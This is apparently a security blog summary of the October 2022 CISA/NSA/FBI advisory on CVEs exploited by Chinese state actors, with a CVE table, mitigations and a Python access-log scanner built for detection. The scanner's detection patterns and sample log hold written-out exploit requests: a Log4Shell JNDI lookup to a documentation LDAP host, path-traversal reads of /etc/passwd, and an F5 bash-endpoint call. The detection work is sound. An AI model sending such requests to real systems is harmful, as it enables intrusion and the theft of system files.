On October 6, 2022, CISA, together with the NSA and FBI, released a joint Cybersecurity Advisory (AA22-279A) urging telecommunications, Defense Industrial Base, and other critical infrastructure organizations to patch and mitigate the Common Vulnerabilities and Exposures (CVEs) most frequently exploited by Chinese (PRC) state-sponsored cyber threat actors since 2020.
Context
According to the report, “PRC state-sponsored cyber actors continue to target government and critical infrastructure networks with an increasing array of new and adaptive techniques—some of which pose a significant risk to Information Technology Sector organizations (including telecommunications providers), Defense Industrial Base (DIB) Sector organizations, and other critical infrastructure organizations.
PRC state-sponsored cyber actors continue to exploit known vulnerabilities and use publicly available tools to target networks of interest. NSA, CISA, and FBI assess PRC state-sponsored cyber actors have actively targeted U.S. and allied networks as well as software and hardware companies to steal intellectual property and develop access into sensitive networks.”
CVEs
The joint advisory lists the following vulnerabilities as the ones most often exploited by Chinese state-sponsored threat actors since 2020:
| Vendor | CVE | Vulnerability Type |
|---|---|---|
| Apache Log4j | CVE-2021-44228 | Remote Code Execution |
| Pulse Connect Secure | CVE-2019-11510 | Arbitrary File Read |
| GitLab CE/EE | CVE-2021-22205 | Remote Code Execution |
| Atlassian | CVE-2022-26134 | Remote Code Execution |
| Microsoft Exchange | CVE-2021-26855 | Remote Code Execution |
| F5 Big-IP | CVE-2020-5902 | Remote Code Execution |
| VMware vCenter Server | CVE-2021-22005 | Arbitrary File Upload |
| Citrix ADC | CVE-2019-19781 | Path Traversal |
| Cisco Hyperflex | CVE-2021-1497 | Command Line Execution |
| Buffalo WSR | CVE-2021-20090 | Relative Path Traversal |
| Atlassian Confluence Server and Data Center | CVE-2021-26084 | Remote Code Execution |
| Hikvision Webserver | CVE-2021-36260 | Command Injection |
| Sitecore XP | CVE-2021-42237 | Remote Code Execution |
| F5 Big-IP | CVE-2022-1388 | Remote Code Execution |
| Apache | CVE-2022-24112 | Authentication Bypass by Spoofing |
| ZOHO | CVE-2021-40539 | Remote Code Execution |
| Microsoft | CVE-2021-26857 | Remote Code Execution |
| Microsoft | CVE-2021-26858 | Remote Code Execution |
| Microsoft | CVE-2021-27065 | Remote Code Execution |
| Apache HTTP Server | CVE-2021-41773 | Path Traversal |
Community Impact
Many retail, hospitality, and travel organizations either overlap with or depend on the sectors highlighted by the joint advisory (telecommunications, defense, and critical infrastructure). These include, but are not limited to, food retailers and distributors, manufacturers and wholesalers, and airlines. Organizations are therefore advised to implement the mitigations provided in the advisory where possible, and to put compensating defensive measures in place where a mitigation is not feasible.
Mitigation Options
The joint report provided the following recommendations:
- Update and patch systems as soon as possible. Prioritize patching vulnerabilities identified in this CSA and other known exploited vulnerabilities.
- Utilize phishing-resistant multi-factor authentication whenever possible. Require all accounts with password logins to have strong, unique passwords, and change passwords immediately if there are indications that a password may have been compromised.
- Block obsolete or unused protocols at the network edge.
- Upgrade or replace end-of-life devices.
- Move toward the Zero Trust security model.
- Enable robust logging of Internet-facing systems and monitor the logs for anomalous activity.
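The last recommendation above (log Internet-facing systems and watch for anomalous activity) pairs naturally with the CVE table: several of the listed bugs leave a distinctive request in an ordinary web server access log. The script below is an added example, not code from the advisory or from any vendor, that parses combined-format access log lines and flags requests matching request-level indicators for five of the listed CVEs. The indicator patterns are the widely published exploitation signatures for those bugs and are chosen here as an illustrative assumption (the advisory does not list them, and they are not exhaustive); the sample log lines are constructed, with RFC 5737 documentation addresses. The check also URL-decodes each field so a percent-encoded `${jndi:` string is caught, and it keeps the HTTP status so an analyst can separate a 2xx (likely successful exploitation) from a 4xx (probing that was blocked or failed).

```python
import re
from urllib.parse import unquote

# Combined log format (Apache httpd / nginx default): client IP, identity, user,
# timestamp, request line, status, size, and optionally referer and user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Request-level indicators for some of the advisory's CVEs. These are the widely
# published exploitation signatures for each bug, used here as an illustrative
# assumption; the advisory itself does not list them, and they are not exhaustive.
INDICATORS = {
    "CVE-2021-44228": re.compile(r"\$\{jndi:", re.I),                 # Log4Shell JNDI lookup string
    "CVE-2021-41773": re.compile(r"/\.%2e/|/%2e%2e/", re.I),          # Apache httpd encoded-dot traversal
    "CVE-2019-19781": re.compile(r"/vpn/\.\./vpns/", re.I),           # Citrix ADC traversal into /vpns/
    "CVE-2020-5902":  re.compile(r"/tmui/login\.jsp/\.\.;/", re.I),  # F5 TMUI path-normalisation bypass
    "CVE-2022-1388":  re.compile(r"/mgmt/tm/util/bash", re.I),       # F5 iControl REST bash endpoint
}

# Constructed sample log (not real traffic). One benign request, several exploit
# attempts, and one malformed line to exercise the parser's error path.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Oct/2022:10:01:12 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
198.51.100.7 - - [06/Oct/2022:10:02:03 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1" 200 1223 "-" "curl/7.68.0"
198.51.100.7 - - [06/Oct/2022:10:02:09 +0000] "GET /vpn/../vpns/cfg/smb.conf HTTP/1.1" 200 83 "-" "python-requests/2.25"
192.0.2.44 - - [06/Oct/2022:10:03:31 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://192.0.2.44:1389/a}"
192.0.2.44 - - [06/Oct/2022:10:03:40 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.44%3A1389%2Fb%7D HTTP/1.1" 404 210 "-" "Mozilla/5.0"
198.51.100.9 - - [06/Oct/2022:10:04:02 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1431 "-" "python-requests/2.28"
198.51.100.9 - - [06/Oct/2022:10:04:20 +0000] "POST /mgmt/tm/util/bash HTTP/1.1" 200 310 "-" "python-requests/2.28"
this line is deliberately malformed and should be counted, not dropped silently
"""


def parse_line(line):
    """Return the log fields as a dict, or None when the line is not combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def match_indicators(fields):
    """Return the CVE ids whose indicator matches the path, referer or user agent,
    testing both the raw value and its URL-decoded form."""
    haystacks = []
    for key in ("path", "referer", "ua"):
        raw = fields.get(key) or ""
        haystacks.append(raw)
        haystacks.append(unquote(raw))
    return [cve for cve, pat in INDICATORS.items() if any(pat.search(h) for h in haystacks)]


def scan_log(lines):
    """Return (findings, unparsed) where findings is a list of
    (cve, client_ip, http_status, raw_path) in log order and unparsed counts
    lines the parser rejected, so a broken log format is visible rather than silent."""
    findings, unparsed = [], 0
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            unparsed += 1
            continue
        for cve in match_indicators(fields):
            findings.append((cve, fields["ip"], int(fields["status"]), fields["path"]))
    return findings, unparsed


def summarize(findings):
    """Group findings as {client_ip: {cve: [status codes seen]}} so a source that
    received a 2xx on an exploit request stands out from one that was only blocked."""
    by_ip = {}
    for cve, ip, status, _path in findings:
        by_ip.setdefault(ip, {}).setdefault(cve, []).append(status)
    return by_ip


if __name__ == "__main__":
    found, bad = scan_log(SAMPLE_LOG.splitlines())
    for cve, ip, status, path in found:
        print(f"{cve}  {ip}  {status}  {path}")
    print(f"unparsed lines: {bad}")
    print(summarize(found))
```

A 2xx on a traversal or `/mgmt/tm/util/bash` request is a strong signal that the exploit succeeded and should trigger incident response on that host, not just a block of the source address; a 4xx-only source is more consistent with opportunistic scanning. The patterns here are deliberately narrow and are not a substitute for patching, which the advisory puts first for a reason.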